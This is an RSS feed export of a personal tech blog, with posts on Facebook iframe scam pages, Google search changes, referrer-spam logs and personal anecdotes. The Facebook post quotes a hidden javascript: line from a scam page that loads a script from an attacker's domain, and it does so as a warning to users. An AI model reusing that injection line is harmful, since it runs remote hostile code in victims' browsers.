<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Smackdown! &#187; On The Ball-ness</title>
	<atom:link href="http://smackdown.blogsblogsblogs.com/category/on-the-ball-ness/feed/" rel="self" type="application/rss+xml" />
	<link>http://smackdown.blogsblogsblogs.com</link>
	<description>Smackdown!</description>
	<lastBuildDate>Tue, 22 Nov 2011 22:40:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>What&#8217;s A Faster Way To Get A Virus Than Browsing Porn? That&#8217;s Right: The New Facebook</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/#comments</comments>
		<pubDate>Wed, 04 May 2011 17:23:26 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[bad research]]></category>
		<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=974</guid>
		<description><![CDATA[Quit staring, it&#8217;s just a thumb. Facebook has never been known for it&#8217;s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don&#8217;t, with only a minimal amount of technical know-how required [...]]]></description>
			<content:encoded><![CDATA[<div style="float:right; margin: 4px;"><img src="/images/condom-thumb2.png" onmouseup="hl2l(event);" alt="Quit staring, it is just a thumb."><br /><em style="font-size: 10px;">Quit staring, it&#8217;s just a thumb.</em></div>
<p> Facebook has never been known for it&#8217;s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don&#8217;t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about &#8220;scareware&#8221;, or &#8220;phishing scams&#8221;, or even how to clean a virus from their machine if they get one. Sure, they&#8217;ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, <em>everyone</em> is on Facebook&#8230; it must be safe. The result is a gigantic community of <span id="more-974"></span><a href="http://en.wikipedia.org/wiki/Confidence_trick" target="_blank">gullible marks</a> just waiting to be exploited or infected by scammers and hackers.</p>
<p>That is why a couple of years ago I wrote a post on <a href="http://smackdown.blogsblogsblogs.com/2009/12/18/facebook-twitter-myspace-hacking-how-to-keep-it-from-happening-to-you/" target="_blank">how to prevent getting hacked on Facebook</a> (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be <em>sure</em> you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.</p>
<p>For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the <a href="http://www.google.com/search?num=100&#038;q=iframe+hack+wordpress" target="_blank">iframe hack</a>. For those of you who don&#8217;t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It&#8217;s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook &#8220;Like&#8221; buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that <em>you only ever embed iframes from sites you trust</em>. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.</p>
<p>The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It&#8217;s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.</p>
<p>Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to <a href="http://developers.facebook.com/blog/post/462" target="_blank">utilize iframes</a> into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend&#8217;s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That&#8217;s what I saw what was going on. This is what the page looked like with normal styles turned on:</p>
<p>&nbsp;</p>
<p><a href="/images/facebook-page-with-iframe.png" target="_blank"><img src="/images/facebook-page-with-iframe-sm.png" onmouseup="hl2l(event);" alt="Facebook page with iframe" border="0"></a><br />
(<em>click to enlarge</em>)</p>
<p>&nbsp;</p>
<p>Clicking that button then revealed these instructions:</p>
<p>&nbsp;</p>
<p><img src="/images/facebook-iframe-instructions.png" onmouseup="hl2l(event);" alt="Facebook page with iframe instructions" border="0"></p>
<p>&nbsp;</p>
<p>What was not revealed, however, was the hidden &lt;textarea&gt; containing Javascript code that would then be fired if you did follow those instructions:</p>
<p>&nbsp;</p>
<p><code>&lt;textarea id="c"&gt;javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)&lt;/textarea&gt;</code></p>
<p>&nbsp;</p>
<p>This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it&#8217;s all downhill from there.</p>
<p>Of course, odds are pages like this won&#8217;t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no &#8220;This page is hacking users&#8221; option. In fact, if you look at the &#8220;Like&#8221; counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a <em>legitimate</em> page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.</p>
<p>The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the <a href="http://www.ftc.gov/" target="_blank">FTC</a> goes after companies and organizations that do not adequately <a href="http://www.ftc.gov/opa/2011/05/security.shtm" target="_blank">protect their user&#8217;s data</a>:</p>
<p> &nbsp;</p>
<p><a href="http://twitter.com/FTCgov/status/65780912843014144" target="_blank"><img src="/images/ftc-consumer-info-tweet.png" onmouseup="hl2l(event);" alt="Since 2001, the FTC has brought 34 law enforcement actions against businesses that allegedly failed to protect consumers personal info." border="0"></a></p>
<p>&nbsp;</p>
<p>Maybe they should start taking a look at companies that don&#8217;t adequately protect the actual users as well.</p>
<div><em>Thumb (yes, it&#8217;s a thumb) in <a href="http://www.flickr.com/photos/figleaf/491966201/" target="_blank">condom</a> image attribution goes to <a href="http://www.flickr.com/photos/figleaf/">figleaf</a>.</em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/05/04/whats-a-faster-way-to-get-a-virus-than-browsing-porn-thats-right-the-new-facebook/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Google Censors Torrent Sites &#8211; Except For The Pirate Bay</title>
		<link>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/#comments</comments>
		<pubDate>Thu, 27 Jan 2011 17:49:18 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=883</guid>
		<description><![CDATA[Yesterday Search Engine Land reported about Google removing piracy-related terms from it&#8217;s Instant Search, which includes the word torrents, names of torrent sites, names of torrent clients, and other file sharing sites such as RapidShare and Megaupload. This does raise some concerns, seeing as how, as SELand&#8217;s Matt McGee mentions, torrents and file sharing sites [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday Search Engine Land reported about <a href="http://searchengineland.com/google-removes-piracy-related-terms-from-instant-search-62597" target="_blank">Google removing piracy-related terms from it&#8217;s Instant Search</a>, which includes the word torrents, names of torrent sites, names of torrent clients, and other file sharing sites such as RapidShare and Megaupload. This does raise some concerns, seeing as how, as SELand&#8217;s <a href="http://twitter.com/mattmcgee" target="_blank">Matt McGee</a> mentions, torrents and file sharing sites in and of themselves are not inherently illegal. Of course, neither is porn, but Google seems to have seen fit to <a href="http://mashable.com/2010/09/08/google-instant-search-naughty-words/" target="_blank">remove that genre from it&#8217;s Instant Search</a> as well.</p>
<p>Does this mean that Google really hates torrent sites? Well, not all of them, apparently. <a href="http://thepiratebay.org/" target="_blank">The Pirate Bay</a>, world&#8217;s largest bittorrent tracker, <span id="more-883"></span>is still receiving much love from Google:</p>
<p>&nbsp;</p>
<p><a href="/images/google-loves-pirate-bay2.png" target="_blank"><img src="/images/google-loves-pirate-bay2-sm.png" onmouseup="hl2l(event);" alt="The worlds most resilient bittorrent site." border="0"></a><br />
(<em>click to enlarge</em>)</p>
<p>&nbsp;</p>
<p>How long will this listing last is anyone&#8217;s guess, but it is interesting in light of the fact that it is the most notorious of all the torrent sites out there. Kind of odd that this would be the one that they missed in their censorship sweep. </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2011/01/27/google-censors-torrent-sites-except-for-the-pirate-bay/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>My Mom Needed Me To Let The Plumber In While She Was At Work (True Story)</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/#comments</comments>
		<pubDate>Tue, 01 Jun 2010 02:54:41 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[how-to]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=687</guid>
		<description><![CDATA[I work from my house and keep odd hours, so when a family member needs some sort of worker let into their house during the day I am often asked if I am available to do it. I don&#8217;t mind, we all live fairly close together, and it&#8217;s not that much of a hassle on [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/bathtub-drain.jpg" onmouseup="hl2l(event);" style="float: right;" alt="Complex bath mechanisms"> I work from my house and keep odd hours, so when a family member needs some sort of worker let into their house during the day I am often asked if I am available to do it. I don&#8217;t mind, we all live fairly close together, and it&#8217;s not that much of a hassle on most days. Tonight my mom called and asked me if I could let someone in to her place tomorrow to look at her tub, because it&#8217;s clogged. She&#8217;s tried Drano twice, poured boiling hot water in it, and even tried plunging it, all to no avail. I told her it would be no problem for me to let someone in.</p>
<p>A little while later I went into my own bathroom, and while in there happened to glance at my own tub&#8230;<span id="more-687"></span></p>
<p>I called her back and asked her how much water was in her tub. She said maybe an inch or so. I asked her to go look at it, and she informed me that she was already in there.</p>
<p><strong>Me:</strong> &#8220;You know that little lever just below the spout? Is it pointed up, or down?&#8221;</p>
<p><strong>My mom:</strong> &#8220;Up&#8221;</p>
<p><strong>Me:</strong> &#8220;Push it down&#8221;</p>
<p>(<em>silence&#8230; except for the sound of water draining from her tub&#8230;</em>)</p>
<p><strong>My mom:</strong> &#8220;Who the fuck put that up???&#8221;</p>
<p><em>At this point I can barely breathe because I am laughing so hard. She adds more water to the tub, just to make sure it actually is going down, and swears some more.</em></p>
<p><strong>Me:</strong> &#8220;Mom, how long has your tub been &#8216;clogged&#8217;?&#8221;</p>
<p><strong>My mom:</strong> &#8220;A week&#8221;</p>
<p>I lost it. I&#8217;m still giggling as I write this. During her extensive cussing she tried to get me to swear never to tell a soul, but I just had to share. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><em>You may also like:</em> <a href="http://smackdown.blogsblogsblogs.com/2011/09/04/taylor-swifts-um-like-youtube-interview/">Taylor Swift&#8217;s, Um, Like, YouTube Interview</a></p>
<div><em><a href="http://www.flickr.com/photos/warrenski/2775894594/" target="_blank">Bathtub drain image</a> attribution goes to <a href="http://www.flickr.com/photos/warrenski/">warrenski</a>.</em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2010/05/31/my-mom-needed-me-to-let-the-plumber-in-while-she-was-at-work-true-story/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Is Google Referrer Spamming Too Now?</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 13:59:41 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=463</guid>
		<description><![CDATA[Yesterday a friend of mine sent me a section of her traffic logs that were showing some odd information. According to what was recorded there her brand new, as of yet unlinked-to website was ranking on the first page of Google for the single keyword, [free]. If she actually had managed to rank for that [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday a friend of mine sent me a section of her traffic logs that were showing some odd information. According to what was recorded there her brand new, as of yet unlinked-to website was ranking on the first page of Google for the single keyword, [<a href="http://www.google.com/search?q=free" target="_blank">free</a>]. If she actually had managed to rank for that phrase it would be an amazing feat to say the least. The competition for that single word is enormous. Unsurprisingly, when performing that actual search her site is nowhere to be found. The site in question is barely one week old, and hasn&#8217;t even been launched yet.</p>
<p>What is surprising, to me anyways, is that it appears that the traffic is actually coming from a bot at Google&#8230; a bot that is cloaked, sending fake<span id="more-463"></span> referrers, and behaving in exactly the same manner as <a href="http://smackdown.blogsblogsblogs.com/2007/11/13/microsoft-needs-to-quit-fucking-with-my-adsense-scripts/" target="_blank">MSN&#8217;s referrer spamming</a> bot that first showed up a little over 2 years ago. I blogged about it back then, as did <a href="http://sebastians-pamphlets.com/msn-admits-clueless-and-ineffective-spamming/" target="_blank">many<a/> <a href="http://ekstreme.com/thingsofsorts/blogging/yell-if-microsofts-livecom-spammed-you-too" target="_blank">others</a>. Eventually, after much feedback from the community, they <a href="http://www.seroundtable.com/archives/020672.html" target="_blank">did halt</a> the referrer spam practice. It was a bad idea for them to do it in the first place, and quite a few webmasters were perturbed about it. Two years was too long for it to go on, but at least they did finally stop doing it.</p>
<p>Now it looks like Google, for some unfathomable reason, has decided to start doing the exact same thing. The entries in my friend&#8217;s traffic logs looked like this:</p>
<blockquote class="eml"><p>74.125.126.81 &#8211; - [14/Feb/2010:16:34:03 -0600] &#8220;GET / HTTP/1.1&#8243; 200 19361 &#8220;http://www.google.com/search?hl=en&#038;q=free&#038;btnG=Google+Search&#038;aq=f&#038;oq=&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)&#8221;</p>
<p>72.14.192.3 &#8211; - [14/Feb/2010:16:36:28 -0600] &#8220;GET / HTTP/1.1&#8243; 200 19361 &#8220;http://www.google.com/search?hl=en&#038;q=free&#038;btnG=Google+Search&#038;aq=f&#038;oq=&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)&#8221;</p></blockquote>
<p>The IP&#8217;s in question definitely belong to Google (as can be seen here <a href="http://ws.arin.net/whois/?queryinput=74.125.126.81" target="_blank">74.125.126.81</a>, and here <a href="http://ws.arin.net/whois/?queryinput=72.14.192.3" target="_blank">72.14.192.3</a>). However, unlike normal Googlebot IP&#8217;s, these are not associated with the Google domain name via dns. For instance, if you do a host lookup on 66.249.71.233 you will see that it resolves to the hostname crawl-66-249-71-233.googlebot.com. The IP&#8217;s that the referrer spam is coming from do not resolve to any hostname. Presumably, going on the logic that MSN gave when they were first called out for doing this, the reason for not having a reverse dns associated with the IP&#8217;s is to hide the fact that they actually are from Google. Similarly the user-agent of these bots is being cloaked as well. Instead actually identifying as Googlebot, &#8220;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#8221;, these bots are pretending to be an actual user using IE6 on Windows.</p>
<p>Unlike actual web surfers, Google, you have no expectation of privacy. When you are a bot, skulking around trying to disguise yourself as someone else is poor netiquette to say the least. I am not sure exactly what prompted you to start doing this, but you really should just stop.</p>
<p><strong>Update:</strong></p>
<p>Barry Schwartz of Search Engine Land contacted Google about this, and they <a href="http://searchengineland.com/is-google-referrer-spamming-to-detect-spam-36453/" target="_blank">replied back</a> that this is indeed them performing cloaked spidering. However, according to them it is not being done for spam detection purposes, and the particular referrers used were in error:</p>
<blockquote><p>Turns out, we were running an experiment to detect malware targeting Hot Trends queries related to the Haiti crisis. Because this experiment was developed in response to an urgent situation we moved quickly and as a result used an incorrect Google search referrer which we’re now working to fix. Thanks for calling this issue to our attention and we apologize for any confusion we may have caused.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2010/02/16/is-google-referrer-spamming-too-now/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Google Re-initiates Testing of AJAX SERP&#8217;s With Faulty Proposed Fix</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 16:14:11 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=297</guid>
		<description><![CDATA[Last month I blogged about the fact that I had noticed that Google was playing around with delivering the SERP&#8217;s via AJAX. I pointed out that due to the way that referrers work, using AJAX to generate the pages would cause all traffic coming from Google to look like it was coming from Google&#8217;s homepage [...]]]></description>
			<content:encoded><![CDATA[<p>Last month I blogged about the fact that I had noticed that <a href="http://smackdown.blogsblogsblogs.com/2009/02/02/what-will-really-break-if-google-switches-to-ajax/" target="_blank">Google was playing around with delivering the SERP&#8217;s via AJAX</a>. I pointed out that due to the way that referrers work, using AJAX to generate the pages would cause all traffic coming from Google to look like it was coming from Google&#8217;s homepage instead of from a search. This means in turn that analytics packages, including Google Analytics, would no longer be able to track what keywords searched on in Google were sending traffic to the webmaster&#8217;s websites. There was a <a href="http://getclicky.com/blog/150/googles-new-ajax-powered-search-results-breaks-search-keyword-tracking-for-everyone" target="_blank">bit of a buzz</a> about it, and Google seemed to stop the testing shortly thereafter. <a href="http://searchengineland.com/google-ajax-search-results-death-to-search-term-tracking-16431" target="_blank">Google&#8217;s only reply</a> on the subject was &#8220;sometimes we test stuff&#8221;, to point to a <a href="http://googleblog.blogspot.com/2006/04/this-is-test-this-is-only-test.html" target="_blank">post from three years ago</a> that also said, &#8220;sometimes we test stuff&#8221;, to say that they didn&#8217;t intend to break referrer tracking, and that was it.</p>
<p>Shortly thereafter, the tests<span id="more-297"></span> appeared to have stopped. People stopped thinking that Google was linking to them from their homepage, and in very short time the buzz died down about it. </p>
<p>Yesterday afternoon, someone pointed out to me that the subject came up again during Matt Cutt&#8217;s keynote address at PubCon South. According to <a href="http://outspokenmedia.com/internet-marketing-conferences/pubcon-keynote-matt-cutts/" target="_blank">Lisa Barone&#8217;s live blogging efforts</a> the conversation went something like this:</p>
<blockquote><p>Brett: How about the JavaScript test.</p>
<p>Matt: That was really funny. The team there only thinks about speed. They want to get the results back to users as quick as humanly possible.  JavaScript makes the search results a lot faster. Suppose you do a search for flowers, as you’re typing flowers, they can do a query from the back end and fold search results right into the page. You’re still in Google.com and they can pull in the results automatically.  It doesn’t give you the referrer. <strong>He says the team didn’t think about the referrer aspect. So they stopped.  They’ve paused it until they can find out how to keep the referrers.</strong></p></blockquote>
<p>Ok, fine. So they didn&#8217;t know about the referrer issue (and didn&#8217;t give me credit for pointing it out to them before it was more than just a test, *cough* *cough*), so they stopped until they can figure out a way to fix it.</p>
<p>Less than 1 hour after reading that, I happened to notice an over-abundance of url&#8217;s in the serps that were getting redirected though Google&#8217;s url redirection service. For those who are unaware of what I mean by that, it is a tool that Google uses to enhance their own behind-the-scenes tracking of user behavior. You can see it most consistently when Google displays sitelinks. They redirect the clicks through their own tracking mechanism first, so that they can determine how many people are actually using those extra links. Instead of going directly to the page in question, it goes through a link like this:</p>
<p><a href="http://www.google.com/url?q=http://www.bad-neighborhood.com/text-link-tool.htm&#038;ei=in66ScnjBtKgtwfn0LTiDw&#038;sa=X&#038;oi=smap&#038;resnum=1&#038;ct=result&#038;cd=1&#038;usg=AFQjCNF9RdVC6vXBFOYvdia1s_ZE_BMu8g" target="_blank">http://www.google.com/url?q=http://www.bad-neighborhood.com/text-link-tool.htm&#038;ei=in&#8230;</a></p>
<p>If you view one of those links using a <a href="http://www.bad-neighborhood.com/header_detector.php" target="_blank">header detector</a>, you can see that after doing whatever tracking they do on their backend, they then redirect the user via a 302 Redirect onwards to the final destination page:</p>
<blockquote class="eml"><p>User-Agent used to fetch header:<br />
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0</p>
<p>HTTP/1.0 302 Found<br />
Location: http://www.bad-neighborhood.com/text-link-tool.htm<br />
Cache-Control: private<br />
Content-Type: text/html; charset=UTF-8<br />
Date: Fri, 13 Mar 2009 15:44:42 GMT<br />
Server: gws<br />
Content-Length: 247</p></blockquote>
<p>Occasionally you will see these Google redirects in the normal serps as well, although usually not. The thing is, I was seeing them on every search I performed. It struck me as odd, until I suddenly realized that <em>every search was being done via AJAX</em>:</p>
<p><img src="/images/ajax-urls-again.png" alt="Google testing AJAX serps  again" onmouseup="hl2l(event);" class="centered"></p>
<p><img src="/images/google-url-intercept.png" alt="Google redirecting all serps traffic through Google.com" onmouseup="hl2l(event);" class="centered"></p>
<p>Here&#8217;s the problem, Google. That will <em>not</em> fix the referrer issue, which is what the issue is with every non-Google analytics package that exists. Without that, then the traffic coming from Google cannot be accurately analyzed (unless, of course, the analytics program has access to whatever it is that Google&#8217;s redirect script is recording). For one, a 302 redirect passes on the referrer of the original page, not the one of the tracking script, and for another there are no unencrypted keywords included in your tracking urls. It doesn&#8217;t take pushing the test to the live servers to figure this out, either. The engineers <em>had</em> to have known this beforehand. This means that if Matt was correct, and Google did indeed stop the testing until they could make it work with analytics, then <strong>the <em>only</em> analytics package they were worried about AJAX serps working with is Google Analytics</strong>.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/03/13/google-re-initiates-testing-of-ajax-serps-with-faulty-proposed-fix/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Robert Scoble Chews Out Lisa Barone&#8217;s Ass For Taking His Name In Vain &#8211; WTF?</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 04:36:34 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=292</guid>
		<description><![CDATA[Tonight Robert &#8216;I Am Thy Lord And Thou Shalt Kneel, Bitches!&#8217; Scoble, a blogger who has some claim to internet fame through his blog Scobleizer, decided that the title of &#8220;technical evangelist&#8221; that has been often attributed him simply wasn&#8217;t enough, and that deity is apparently more fitting. Lisa Barone wrote a piece talking about [...]]]></description>
			<content:encoded><![CDATA[<p>Tonight <a href="http://twitter.com/Scobleizer" target="_blank">Robert &#8216;I Am Thy Lord And Thou Shalt Kneel, Bitches!&#8217; Scoble</a>, a blogger who has some claim to internet fame through his blog Scobleizer, decided that the title of &#8220;<a href="http://en.wikipedia.org/wiki/Robert_Scoble" target="_blank">technical evangelist</a>&#8221; that has been often attributed him simply wasn&#8217;t enough, and that deity is apparently more fitting.</p>
<p>Lisa Barone <a href="http://outspokenmedia.com/branding/false-idols/" target="_blank">wrote a piece</a> talking about personal brands and false idols on the web. In it she wrote the following paragraph:</p>
<blockquote><p>Don&#8217;t support personal brands built on smoke and mirrors. Make people work for the brands they&#8217;re trying to create. Don&#8217;t let them <strong>scoble</strong> their way in. Don&#8217;t accept that someone is important just because they act like they are or someone told you they were.</p></blockquote>
<p>Apparently Robert is the ultra sensitive type, and didn&#8217;t take too kindly<span id="more-292"></span> to her choice of wordage. Here is his reply:</p>
<p><img src="/images/scoble.png" alt="...you might do some research behind how I actually got here before you take my name in vain. - Robert Scoble" onmouseup="hl2l(event);" class="centered"></p>
<p>Wow, Bob. Way to identify with the lowly masses out there. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/03/02/robert-scoble-chews-out-lisa-barones-ass-for-taking-his-name-in-vain-wtf/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>SERPs Scrapers, Rejoice! Matt Cutts Endorses Indexing Of Search Results In Google!</title>
		<link>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/#comments</comments>
		<pubDate>Wed, 21 Jan 2009 22:39:52 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[the prez]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=231</guid>
		<description><![CDATA[That&#8217;s right&#8230; today Matt Cutts completely reversed his opinion on pages indexed in Google that are nothing more than copies of auto-generated snippets. Back in March of 2007, Matt discussed search results within search results, and Google&#8217;s dislike for them: In general, we&#8217;ve seen that users usually don&#8217;t want to see search results (or copies [...]]]></description>
			<content:encoded><![CDATA[<p>That&#8217;s right&#8230; today Matt Cutts completely reversed his opinion on pages indexed in Google that are nothing more than copies of auto-generated snippets. </p>
<p>Back in March of 2007, Matt discussed <a href="http://www.mattcutts.com/blog/search-results-in-search-results/" target="_blank">search results within search results</a>, and Google&#8217;s dislike for them:</p>
<blockquote><p>In general, we&#8217;ve seen that users usually don&#8217;t want to see search results (or copies of websites via proxies) in their search results. Proxied copies of websites and search results that don&#8217;t add much value already fall under our quality guidelines (e.g. &#8220;Don&#8217;t create multiple pages, subdomains, or domains with substantially duplicate content.&#8221; and &#8220;Avoid &#8220;doorway&#8221; pages created just for search engines, or other &#8220;cookie cutter&#8221; approaches&#8230;&#8221;), so Google does take action to reduce the impact of those pages in our index.</p>
<p>But just to close the loop on the original question on that thread and clarify that Google reserves the right to reduce the impact of search results and proxied copies of web sites on users, Vanessa also had someone add a line to the quality guidelines page. The new webmaster guideline that you&#8217;ll see on that page says &#8220;Use robots.txt to prevent crawling of search results pages or other auto-generated pages that don&#8217;t add much value for users coming from search engines.&#8221; &#8211; <em>Matt Cutts</em></p></blockquote>
